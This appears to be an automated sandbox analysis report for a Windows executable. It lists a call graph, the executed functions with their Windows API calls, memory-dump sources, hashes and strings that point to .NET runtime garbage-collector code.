16400 7ff774a40704 16399->16400 16401 7ff774a40857 16400->16401 16402 7ff774a17080 WaitForSingleObject 16400->16402 16401->16366 16408 7ff774a4073d 16402->16408 16403 7ff774a40840 16403->16366 16404 7ff774a407c9 SwitchToThread 16404->16408 16405 7ff774a407f5 SwitchToThread 16405->16408 16406 7ff774a128e0 SleepEx 16406->16408 16407 7ff774a40880 WaitForSingleObject 16407->16408 16408->16403 16408->16404 16408->16405 16408->16406 16408->16407 16409 7ff774a407bd SwitchToThread 16408->16409 16409->16408 16411 7ff774a128ed 16410->16411 16412 7ff774a128e4 SleepEx 16410->16412 16411->16366 16412->16411 16414 7ff774a1d69c 16413->16414 16415 7ff774a1d80b 16413->16415 16414->16415 16416 7ff774a128e0 SleepEx 16414->16416 16418 7ff774a1d6df 16416->16418 16417 7ff774a1d78a SwitchToThread 16417->16418 16418->16415 16418->16417 16419 7ff774a1d7b6 SwitchToThread 16418->16419 16420 7ff774a128e0 SleepEx 16418->16420 16421 7ff774a40880 WaitForSingleObject 16418->16421 16422 7ff774a1d77e SwitchToThread 16418->16422 16419->16418 16420->16418 16421->16418 16422->16418 16424 7ff774a40896 16423->16424 16425 7ff774a408cd 16424->16425 16431 7ff774a12c40 WaitForSingleObject 16424->16431 16425->16390 16428 7ff774a17098 16427->16428 16432 7ff774a12c40 WaitForSingleObject 16428->16432 16433 7ff774a18602 16434 7ff774a18608 16433->16434 16457 7ff774a29420 16434->16457 16437 7ff774a18644 16461 7ff774a12880 QueryPerformanceCounter 16437->16461 16440 7ff774a18662 16462 7ff774a0a4d0 16440->16462 16442 7ff774a187a5 16450 7ff774a186c5 16442->16450 16478 7ff774a2a150 16442->16478 16446 7ff774a187ea 16447 7ff774a2d950 11 API calls 16446->16447 16446->16450 16447->16450 16448 7ff774a189d0 16451 7ff774a29420 SwitchToThread 16448->16451 16449 7ff774a18954 16500 7ff774a0a170 16449->16500 16450->16448 16450->16449 16499 7ff774a12880 QueryPerformanceCounter 16450->16499 16454 7ff774a189db 16451->16454 16456 7ff774a189fe 16454->16456 16508 7ff774a128d0 SetEvent 16454->16508 16458 7ff774a2943f 16457->16458 16459 7ff774a18626 16457->16459 16458->16459 16460 7ff774a29481 SwitchToThread 16458->16460 16459->16437 16472 7ff774a128c0 ResetEvent 16459->16472 16460->16458 16461->16440 16463 7ff774a0a4e5 16462->16463 16467 7ff774a0a548 16463->16467 16517 7ff774a0ae00 EventEnabled 16463->16517 16465 7ff774a0a51f 16465->16467 16518 7ff774a0a690 EventWrite 16465->16518 16509 7ff774a05140 16467->16509 16470 7ff774a0a59c 16470->16442 16470->16450 16473 7ff774a29650 16470->16473 16475 7ff774a29670 16473->16475 16474 7ff774a2d950 11 API calls 16474->16475 16475->16474 16476 7ff774a296da 16475->16476 16536 7ff774a2d200 16475->16536 16476->16442 16483 7ff774a2a165 16478->16483 16479 7ff774a2a24d 16480 7ff774a1d210 24 API calls 16479->16480 16485 7ff774a2a25f 16480->16485 16481 7ff774a2a264 16482 7ff774a2e7a0 2 API calls 16481->16482 16484 7ff774a2a28a 16482->16484 16483->16479 16483->16481 16496 7ff774a2a169 16483->16496 16484->16485 16486 7ff774a2a2a1 EnterCriticalSection LeaveCriticalSection 16484->16486 16487 7ff774a23f10 7 API calls 16485->16487 16490 7ff774a2a300 16485->16490 16485->16496 16486->16485 16489 7ff774a2a2e6 16487->16489 16488 7ff774a2a3a8 DebugBreak 16492 7ff774a2a3b7 16488->16492 16489->16490 16491 7ff774a2a2ea 16489->16491 16490->16488 16493 7ff774a2a36b DebugBreak 16490->16493 16495 7ff774a2a388 DebugBreak 16490->16495 16497 7ff774a2a39f 16490->16497 16494 7ff774a26690 5 API calls 16491->16494 16492->16496 16498 7ff774a2a3cb DebugBreak 16492->16498 16493->16490 16494->16496 16495->16490 16496->16446 16497->16488 16497->16492 16498->16496 16499->16449 16501 7ff774a0a17d 16500->16501 16505 7ff774a0a1af 16500->16505 16620 7ff774a0ae00 EventEnabled 16501->16620 16503 7ff774a0a190 16503->16505 16621 7ff774a0a640 EventWrite 16503->16621 16506 7ff774a0a1fe 16505->16506 16624 7ff774a0ae00 EventEnabled 16505->16624 16506->16448 16510 7ff774a0517f 16509->16510 16511 7ff774a051a4 FlushProcessWriteBuffers 16510->16511 16513 7ff774a051d0 16511->16513 16512 7ff774a052a3 16512->16470 16521 7ff774a0ae00 EventEnabled 16512->16521 16513->16512 16514 7ff774a05209 16513->16514 16516 7ff774a0523e SwitchToThread 16513->16516 16514->16513 16522 7ff774a05ea0 16514->16522 16516->16513 16517->16465 16519 7ff774a68fb0 8 API calls 16518->16519 16520 7ff774a0a6fa 16519->16520 16520->16467 16521->16470 16523 7ff774a05ec7 16522->16523 16524 7ff774a05ea7 16522->16524 16523->16514 16524->16523 16525 7ff774a0af22 LoadLibraryExW GetProcAddress 16524->16525 16533 7ff774a0af4e 16524->16533 16525->16533 16526 7ff774a0afaa SuspendThread 16527 7ff774a0aff8 16526->16527 16528 7ff774a0afb8 GetThreadContext 16526->16528 16531 7ff774a68fb0 8 API calls 16527->16531 16529 7ff774a0afef ResumeThread 16528->16529 16530 7ff774a0afd2 16528->16530 16529->16527 16530->16529 16532 7ff774a0b008 16531->16532 16532->16514 16533->16526 16533->16527 16534 7ff774a0af94 GetLastError 16533->16534 16534->16527 16535 7ff774a0af9f 16534->16535 16535->16526 16546 7ff774a2d0a0 16536->16546 16538 7ff774a2d2f6 DebugBreak 16543 7ff774a2d305 16538->16543 16539 7ff774a2d211 16539->16538 16540 7ff774a2d2b9 DebugBreak 16539->16540 16541 7ff774a2d2d6 DebugBreak 16539->16541 16542 7ff774a2d328 16539->16542 16544 7ff774a2d2ed 16539->16544 16540->16539 16541->16539 16542->16475 16543->16542 16545 7ff774a2d319 DebugBreak 16543->16545 16544->16538 16544->16543 16545->16542 16549 7ff774a2d0c2 16546->16549 16547 7ff774a2d115 16557 7ff774a1d210 16547->16557 16549->16547 16550 7ff774a2d130 16549->16550 16552 7ff774a2e7a0 2 API calls 16550->16552 16551 7ff774a2d128 16553 7ff774a2d1e5 16551->16553 16564 7ff774a2f550 16551->16564 16556 7ff774a2d152 16552->16556 16553->16539 16555 7ff774a2d1a2 EnterCriticalSection LeaveCriticalSection 16555->16551 16556->16551 16556->16555 16558 7ff774a1d239 16557->16558 16558->16558 16560 7ff774a1d367 16558->16560 16583 7ff774a34c30 16558->16583 16561 7ff774a1d4ef 16560->16561 16562 7ff774a31660 9 API calls 16560->16562 16561->16551 16563 7ff774a1d516 16562->16563 16563->16551 16565 7ff774a2f569 16564->16565 16566 7ff774a2f605 16564->16566 16587 7ff774a23f10 16565->16587 16566->16553 16568 7ff774a2f5eb 16569 7ff774a26690 5 API calls 16568->16569 16571 7ff774a2f5f8 16569->16571 16571->16553 16572 7ff774a2f58c 16573 7ff774a2f5ce 16572->16573 16574 7ff774a2f591 16572->16574 16575 7ff774a26690 5 API calls 16573->16575 16576 7ff774a2f5b1 16574->16576 16577 7ff774a2f596 16574->16577 16578 7ff774a2f5de 16575->16578 16580 7ff774a26690 5 API calls 16576->16580 16593 7ff774a26690 16577->16593 16578->16553 16581 7ff774a2f5c1 16580->16581 16581->16553 16582 7ff774a2f5a4 16582->16553 16584 7ff774a34c49 16583->16584 16586 7ff774a34c94 16583->16586 16585 7ff774a2fae0 18 API calls 16584->16585 16584->16586 16585->16584 16586->16560 16588 7ff774a23f50 16587->16588 16591 7ff774a23fd4 16587->16591 16588->16591 16601 7ff774a23e10 16588->16601 16591->16566 16591->16568 16591->16572 16592 7ff774a23e10 7 API calls 16592->16591 16594 7ff774a266c7 16593->16594 16596 7ff774a266e9 _swprintf_c_l 16594->16596 16611 7ff774a40630 16594->16611 16597 7ff774a267d0 16596->16597 16618 7ff774a129c0 VirtualFree 16596->16618 16597->16582 16599 7ff774a26795 16599->16597 16600 7ff774a267a3 EnterCriticalSection LeaveCriticalSection 16599->16600 16600->16597 16602 7ff774a23ea1 16601->16602 16603 7ff774a23e53 EnterCriticalSection 16601->16603 16604 7ff774a12930 3 API calls 16602->16604 16605 7ff774a23e7d LeaveCriticalSection 16603->16605 16606 7ff774a23e70 16603->16606 16607 7ff774a23eb2 16604->16607 16605->16602 16606->16605 16608 7ff774a23ee1 LeaveCriticalSection 16606->16608 16609 7ff774a23eed 16607->16609 16610 7ff774a23ec0 EnterCriticalSection 16607->16610 16608->16609 16609->16591 16609->16592 16610->16608 16619 7ff774a129c0 VirtualFree 16611->16619 16613 7ff774a4064a 16614 7ff774a40694 16613->16614 16615 7ff774a4065b EnterCriticalSection 16613->16615 16614->16596 16616 7ff774a4067e 16615->16616 16617 7ff774a40685 LeaveCriticalSection 16615->16617 16616->16617 16617->16614 16618->16599 16619->16613 16620->16503 16622 7ff774a68fb0 8 API calls 16621->16622 16623 7ff774a0a689 16622->16623 16623->16505 16624->16506 16174 7ff774a30750 16175 7ff774a3078d 16174->16175 16177 7ff774a307b7 16174->16177 16176 7ff774a12080 10 API calls 16175->16176 16176->16177

                            Executed Functions

                            Function 00007FF774A126B0 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126BF
                            • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126FD
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12729
                            • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A1273A
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12749
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A127E0
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF774A127F3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                            • String ID:
                            • API String ID: 580471860-0
                            • Opcode ID: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                            • Instruction ID: 0bb792ed4c30f35c7c4c27b288fbc5cf3876677fb59f7f72650bee6cede3d371
                            • Opcode Fuzzy Hash: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                            • Instruction Fuzzy Hash: 9B517A73A3874AC6EA40AF1AA980579A3B2FF44B84FD54436DA4D97364EF3CE405C721
                            Function 00007FF774A05760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00007FF774A0B020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF774A0576B), ref: 00007FF774A0B02B
                              • Part of subcall function 00007FF774A0B020: QueryInformationJobObject.KERNEL32 ref: 00007FF774A0B0FE
                              • Part of subcall function 00007FF774A0AEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF774A03819), ref: 00007FF774A0AED1
                            • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF774A057D8
                              • Part of subcall function 00007FF774A0D7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF774A0D8AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                            • String ID: StressLogLevel$TotalStressLogSize
                            • API String ID: 2876344857-4058818204
                            • Opcode ID: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                            • Instruction ID: 907043b2742b4937d00df016478de8114d91767bf892ccf95e0ef73d8ce74a49
                            • Opcode Fuzzy Hash: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                            • Instruction Fuzzy Hash: 6C417133D38742C1EA10FF329085AB5A791AF41748FA64431EE4D176A6EE6CE509C760
                            Function 00007FF774A19140 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 349 7ff774a19140-7ff774a1916e call 7ff774a0e020 call 7ff774a128a0 354 7ff774a19177-7ff774a19185 349->354 355 7ff774a19170-7ff774a19175 349->355 356 7ff774a19189-7ff774a191d7 call 7ff774a09d10 call 7ff774a12470 call 7ff774a13880 354->356 355->356 363 7ff774a191e9-7ff774a191f0 call 7ff774a12260 356->363 364 7ff774a191d9-7ff774a191e7 356->364 368 7ff774a191f5 363->368 365 7ff774a191fc-7ff774a19278 call 7ff774a13790 call 7ff774a137f0 call 7ff774a137a0 call 7ff774a137c0 call 7ff774a13820 364->365 378 7ff774a1937e-7ff774a19388 365->378 379 7ff774a1927e-7ff774a19285 365->379 368->365 381 7ff774a1982d-7ff774a19843 378->381 382 7ff774a1938e-7ff774a19395 378->382 380 7ff774a1928b-7ff774a19292 379->380 379->381 380->381 383 7ff774a19298-7ff774a192b2 call 7ff774a13800 call 7ff774a137b0 call 7ff774a137d0 380->383 384 7ff774a19399-7ff774a1939c 382->384 407 7ff774a192df-7ff774a192e5 383->407 408 7ff774a192b4-7ff774a192b6 383->408 386 7ff774a193a3-7ff774a193a6 384->386 387 7ff774a193a8-7ff774a193ab 386->387 388 7ff774a193ba-7ff774a193bd 386->388 387->388 391 7ff774a193ad-7ff774a193b4 387->391 392 7ff774a193bf-7ff774a193d1 call 7ff774a137e0 388->392 393 7ff774a19436 388->393 391->381 391->388 403 7ff774a193d3-7ff774a193f3 392->403 404 7ff774a193f5 392->404 396 7ff774a1943d-7ff774a19440 393->396 399 7ff774a19462-7ff774a1947d call 7ff774a13860 396->399 400 7ff774a19442-7ff774a19449 396->400 410 7ff774a1947f-7ff774a19489 399->410 411 7ff774a194d1-7ff774a194e9 call 7ff774a13f50 call 7ff774a13f70 399->411 400->399 405 7ff774a1944b-7ff774a19461 400->405 409 7ff774a193fc-7ff774a193ff 403->409 404->409 407->381 413 7ff774a192eb-7ff774a192f1 407->413 408->381 412 7ff774a192bc-7ff774a192bf 408->412 409->393 414 7ff774a19401-7ff774a19408 409->414 415 7ff774a1948b-7ff774a19492 410->415 416 7ff774a194a3-7ff774a194ba 410->416 430 7ff774a1953c-7ff774a19556 call 7ff774a13900 411->430 431 7ff774a194eb-7ff774a194f6 call 7ff774a13900 411->431 412->381 417 7ff774a192c5-7ff774a192da 412->417 413->381 418 7ff774a192f7-7ff774a192fb 413->418 414->400 420 7ff774a1940a-7ff774a19434 414->420 421 7ff774a194be-7ff774a194ca 415->421 422 7ff774a19494-7ff774a19496 415->422 416->421 417->386 418->381 423 7ff774a19301-7ff774a1930a 418->423 420->396 421->411 425 7ff774a19498-7ff774a1949b 422->425 426 7ff774a1949d-7ff774a194a1 422->426 423->381 427 7ff774a19310-7ff774a1937c 423->427 425->421 426->421 427->384 443 7ff774a19558-7ff774a19568 430->443 444 7ff774a1956c-7ff774a19578 430->444 436 7ff774a194f8-7ff774a19500 call 7ff774a1b910 431->436 437 7ff774a19503-7ff774a19528 call 7ff774a1b8c0 431->437 436->437 447 7ff774a1952a-7ff774a1953a call 7ff774a1b8c0 437->447 448 7ff774a19589-7ff774a195b9 call 7ff774a13f60 call 7ff774a13750 call 7ff774a13870 437->448 443->444 445 7ff774a1957a-7ff774a1957f 444->445 446 7ff774a19581-7ff774a19586 444->446 445->448 446->448 447->448 457 7ff774a195d7-7ff774a195e1 448->457 458 7ff774a195bb-7ff774a195d6 448->458 459 7ff774a1960d-7ff774a19614 457->459 460 7ff774a195e3-7ff774a195ef 457->460 461 7ff774a1961a-7ff774a19621 459->461 462 7ff774a19823 459->462 463 7ff774a195f1-7ff774a195f4 460->463 464 7ff774a195f6-7ff774a1960b 460->464 461->462 465 7ff774a19627-7ff774a19647 call 7ff774a2f640 461->465 462->381 463->461 464->461 467 7ff774a1964c-7ff774a19680 call 7ff774a13f10 call 7ff774a13f40 call 7ff774a13f20 call 7ff774a13f30 465->467 476 7ff774a19686-7ff774a196bd call 7ff774a13810 467->476 477 7ff774a19815 467->477 481 7ff774a196de-7ff774a196f4 476->481 482 7ff774a196bf-7ff774a196dc 476->482 479 7ff774a1981c 477->479 479->462 484 7ff774a19722-7ff774a1972c 481->484 485 7ff774a196f6-7ff774a19720 481->485 483 7ff774a1972e-7ff774a19741 482->483 486 7ff774a1974e 483->486 487 7ff774a19743-7ff774a1974c 483->487 484->483 485->484 488 7ff774a19754-7ff774a19785 call 7ff774a13850 call 7ff774a68fd0 486->488 487->488 488->479 493 7ff774a1978b-7ff774a1979d call 7ff774a11df0 488->493 493->462 496 7ff774a197a3-7ff774a197af call 7ff774a11eb0 493->496 499 7ff774a197c7-7ff774a197fa call 7ff774a2de20 496->499 500 7ff774a197b1-7ff774a197bd call 7ff774a04bd0 496->500 505 7ff774a197fc call 7ff774a68f10 499->505 506 7ff774a19801-7ff774a19804 499->506 500->499 505->506 506->477 508 7ff774a19806-7ff774a19810 call 7ff774a42aa0 call 7ff774a04bd0 506->508 508->477
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
                            • String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
                            • API String ID: 133006248-518909315
                            • Opcode ID: a883baec98bf013cbae05903c849c0ebf41d363100fd1e29f5bb9a2db04b5c56
                            • Instruction ID: 4dffdb5017d4d901db1446dfabca2f3593813e4c499bb02eb64a38c77e120029
                            • Opcode Fuzzy Hash: a883baec98bf013cbae05903c849c0ebf41d363100fd1e29f5bb9a2db04b5c56
                            • Instruction Fuzzy Hash: 3102A563E3D703D2FA14BF13A4D0A74A2B9AF46784FA98936D90E47391DE2DB441C361
                            Function 00007FF774A2C350 Relevance: 1.9, Strings: 1, Instructions: 694COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID: XTk
                            • API String ID: 0-2572781210
                            • Opcode ID: 749d82c22d62133ff419bc4689e0a81499e8b71b87ee6e466b5f5fa1dfb16764
                            • Instruction ID: 73e586422a9a4df9cc7ffb3ae601eb9a0381c65f40384c146ff92d48581e5995
                            • Opcode Fuzzy Hash: 749d82c22d62133ff419bc4689e0a81499e8b71b87ee6e466b5f5fa1dfb16764
                            • Instruction Fuzzy Hash: E562E263A38646D6EA15AF27A5C0B35F791BF85784FA1C236D90E63251EF3CE840D620
                            Function 00007FF774A30750 Relevance: .4, Instructions: 398COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CurrentProcess
                            • String ID:
                            • API String ID: 2050909247-0
                            • Opcode ID: 4b9e56fa8bd82e0999566641afb8b49dffdbdbc37bb6260533037af069611866
                            • Instruction ID: eb1fd7f0b3706550a2e31619d86982a4afcd53fb473a46f180d6e3d60ebd28b4
                            • Opcode Fuzzy Hash: 4b9e56fa8bd82e0999566641afb8b49dffdbdbc37bb6260533037af069611866
                            • Instruction Fuzzy Hash: FD029063E3D606D6FA15AF27A4C0A39F7D1AF45788FA98637C40D52268EF3DB4408621
                            Function 00007FF774A2ED00 Relevance: .3, Instructions: 332COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 63be20e83a5dc59e06a2b4a488b109fcff4d4b7f40a7f9cd1f9333ad3b6f2b2f
                            • Instruction ID: e8b9643512612e3f85ccc0973a7d3bf3cdd8492c50779f242e9cdcfe54ee7a65
                            • Opcode Fuzzy Hash: 63be20e83a5dc59e06a2b4a488b109fcff4d4b7f40a7f9cd1f9333ad3b6f2b2f
                            • Instruction Fuzzy Hash: F9F19023D3DA43D1F601FF27A9C1675E2A16F96388FD58777E40D222A1EF6C70919221
                            Function 00007FF774A12260 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                            • String ID: @$@$@
                            • API String ID: 2645093340-1177533131
                            • Opcode ID: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                            • Instruction ID: d95175de3c3dbf782afd3eb28445d91e10f24764c6a56981a691ac8b2bd6dc13
                            • Opcode Fuzzy Hash: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                            • Instruction Fuzzy Hash: 82512C33629AC1C5EB619F16E8807AAB3B0FB88B54F944535CA9D53B98CF3CD4458711
                            Function 00007FF774A0B020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF774A0576B), ref: 00007FF774A0B02B
                              • Part of subcall function 00007FF774A126B0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126BF
                              • Part of subcall function 00007FF774A126B0: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A126FD
                              • Part of subcall function 00007FF774A126B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12729
                              • Part of subcall function 00007FF774A126B0: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A1273A
                              • Part of subcall function 00007FF774A126B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF774A0B04A), ref: 00007FF774A12749
                              • Part of subcall function 00007FF774A0D7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF774A0D8AD
                            • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF774A0576B), ref: 00007FF774A0B09A
                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF774A0B0AD
                            • QueryInformationJobObject.KERNEL32 ref: 00007FF774A0B0FE
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
